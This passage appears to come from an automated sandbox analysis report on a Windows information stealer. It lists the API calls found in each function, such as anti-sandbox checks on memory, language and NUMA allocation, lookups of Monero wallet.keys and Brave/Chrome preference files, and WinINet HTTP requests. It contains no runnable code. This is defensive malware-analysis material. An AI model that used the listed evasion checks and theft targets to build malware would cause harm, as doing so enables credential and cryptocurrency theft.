                      • Part of subcall function 003B1220: __aulldiv.LIBCMT ref: 003B1266
                      • Part of subcall function 003B1220: ExitProcess.KERNEL32 ref: 003B1294
                      • Part of subcall function 003C6770: GetUserDefaultLangID.KERNEL32 ref: 003C6774
                      • Part of subcall function 003B1190: ExitProcess.KERNEL32 ref: 003B11C6
                      • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                      • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                      • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                      • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                      • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                      • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                    • Sleep.KERNEL32(00001770), ref: 003C6B04
                    • CloseHandle.KERNEL32(?,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                    • ExitProcess.KERNEL32 ref: 003C6B22
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                    • Instruction ID: c81cbdf78560937b4258deb426cd9d45c06c68473f8af1cf3d3a712f3ccdfe1f
                    • Opcode Fuzzy Hash: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                    • Instruction Fuzzy Hash: A131D4B1900608AADB06FBA0DC57FEE7778AB14344F50451CF602EA191EF746D05DBA6

                    Control-flow Graph

                    [Control-flow graph of the function at 003B1220 (basic blocks 003B1220 to 003B129D); graph rendering not reproduced]
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                    • __aulldiv.LIBCMT ref: 003B1258
                    • __aulldiv.LIBCMT ref: 003B1266
                    • ExitProcess.KERNEL32 ref: 003B1294
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                    • Instruction ID: d0b3fe46223a359b6509849882fe235cf117ee26987b39c6fac7bdee404eef2d
                    • Opcode Fuzzy Hash: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                    • Instruction Fuzzy Hash: 05014BB0940308AAEB10EBE4DC49BAEBB78AB14705F608458F705FA280D7B46A458799

                    Control-flow Graph

                    [Control-flow graph of the function entered at 003C6AF3 (basic blocks 003C6ABA to 003C6B22); graph rendering not reproduced]
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                    • Sleep.KERNEL32(00001770), ref: 003C6B04
                    • CloseHandle.KERNEL32(?,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                    • ExitProcess.KERNEL32 ref: 003C6B22
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                    • Instruction ID: 483a6fe3f105f22673f84626d20af7d365911afde9ce3215cf9d07bec748271c
                    • Opcode Fuzzy Hash: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                    • Instruction Fuzzy Hash: E4F058B4A44209ABE702ABA1DC0BFBE7B78EB14741F10451CB507E91C1DBB46D44EBA7

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 5be5968e0eb2416499ce26f4c11a681f17cff91c34a83d80e1b4eeef3420953c
                    • Instruction ID: 429850d42fde1f4ed778b11b24e57a3615a122c9fc9c0332e6af3e9f623d8ba4
                    • Opcode Fuzzy Hash: 5be5968e0eb2416499ce26f4c11a681f17cff91c34a83d80e1b4eeef3420953c
                    • Instruction Fuzzy Hash: 6B2142B5D01209ABDF14DF55E845BEE7B75FB44314F108625F515AB2C0EB706A09CF81

                    Control-flow Graph

                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                      • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                      • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                      • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                      • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                      • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                    • Instruction ID: 93db41ac6ad04fe5507e840c141d46c349189d214b7cabe1be401aafb0440ce5
                    • Opcode Fuzzy Hash: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                    • Instruction Fuzzy Hash: E311F570900608ABCB16FBA0D952FED7778AF50304F804558E90A8E592EF34AF06DB92
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                    • Instruction ID: 4b893b6936f5d5cc32ab2607236d1af9427bd30add2feca547593f0e9763e9da
                    • Opcode Fuzzy Hash: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                    • Instruction Fuzzy Hash: 7B0162B1904204EFC710DF98DD45FAABBB8F704B61F10421AF945E3680C37459048BA2
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                    • ExitProcess.KERNEL32 ref: 003B1143
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                    • Instruction ID: 16493c11ffa36b2e6085d8d4110f41308b8dd2d1878b7cde9bb619007dd5fa8e
                    • Opcode Fuzzy Hash: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                    • Instruction Fuzzy Hash: 9CE086B0945308FBE7106BA0DC0AB587678EB04B45F500044F70CBA5C0C6F82605EA9A
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003B10B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003B10F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                    • Instruction ID: a547e31f6553f2c8b07235ca2967542b870e2044e966d081930935346246b45d
                    • Opcode Fuzzy Hash: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                    • Instruction Fuzzy Hash: CAF0E2B1641208BBE714ABA4AC59FBAB7E8E705B15F300448F608E7280D572AF04DAA1
                    APIs
                      • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                      • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                      • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                      • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                      • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                      • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                    • ExitProcess.KERNEL32 ref: 003B11C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                    • Instruction ID: 1d806d81104ee076c3e1711b2f877e85126436ec45466310670021ab372e1ef5
                    • Opcode Fuzzy Hash: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                    • Instruction Fuzzy Hash: BDE0ECB991430152DA0173B5AC1BF2A339C5B24749F040428FF09DA502FA29ED04DA67
                    APIs
                    • wsprintfA.USER32 ref: 003C38CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C38E3
                    • lstrcat.KERNEL32(?,?), ref: 003C3935
                    • StrCmpCA.SHLWAPI(?,003D0F70), ref: 003C3947
                    • StrCmpCA.SHLWAPI(?,003D0F74), ref: 003C395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C3C67
                    • FindClose.KERNEL32(000000FF), ref: 003C3C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                    • Instruction ID: d100b5e6f64f0fc063cb9deafe4d031c21b507481f025fb29978c3ea73de79ce
                    • Opcode Fuzzy Hash: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                    • Instruction Fuzzy Hash: 3CA11FB29002189BDB25EB64DC85FFE7379BB58700F04858DE60DD6141EB759B88CF62
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,003D0B32,003D0B2B,00000000,?,?,?,003D13F4,003D0B2A), ref: 003BBEF5
                    • StrCmpCA.SHLWAPI(?,003D13F8), ref: 003BBF4D
                    • StrCmpCA.SHLWAPI(?,003D13FC), ref: 003BBF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BC7BF
                    • FindClose.KERNEL32(000000FF), ref: 003BC7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                    • Instruction ID: 6df49409570f79f787eab31721544b4a32ba33fc9a0099d665ab035fcd2a5e87
                    • Opcode Fuzzy Hash: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                    • Instruction Fuzzy Hash: E7424172910208ABCB16FBA0DD56FED737DAB94304F40455CB50ADA181EE34AF49CBA2
                    APIs
                    • wsprintfA.USER32 ref: 003C492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                    • StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                    • StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                    • FindClose.KERNEL32(000000FF), ref: 003C4B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                    • Instruction ID: eddd97862906906f075b95d25ca67f360c63fa4247b087b0f71bf903429f4ca7
                    • Opcode Fuzzy Hash: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                    • Instruction Fuzzy Hash: 446143B2900218ABCB25EBA0DC55FFA737CBB58700F04458DE64DD6141EB75AB49CFA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                    • wsprintfA.USER32 ref: 003C45A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                    • StrCmpCA.SHLWAPI(?,003D0FC4), ref: 003C45EB
                    • StrCmpCA.SHLWAPI(?,003D0FC8), ref: 003C4601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C468B
                    • FindClose.KERNEL32(000000FF), ref: 003C46A0
                    • lstrcat.KERNEL32(?,0118F9C8), ref: 003C46C5
                    • lstrcat.KERNEL32(?,0118E410), ref: 003C46D8
                    • lstrlen.KERNEL32(?), ref: 003C46E5
                    • lstrlen.KERNEL32(?), ref: 003C46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                    • Instruction ID: da9fc257f4bdeeac3befd856386d896b1fbb3d644005a4b51e11fdc9cf03de30
                    • Opcode Fuzzy Hash: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                    • Instruction Fuzzy Hash: 0C5155B29002189BC725EB70DC99FF9737CAB58700F404589F60DD6150EB759B89CFA2
                    APIs
                    • wsprintfA.USER32 ref: 003C3EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C3EDA
                    • StrCmpCA.SHLWAPI(?,003D0FAC), ref: 003C3F08
                    • StrCmpCA.SHLWAPI(?,003D0FB0), ref: 003C3F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C406C
                    • FindClose.KERNEL32(000000FF), ref: 003C4081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
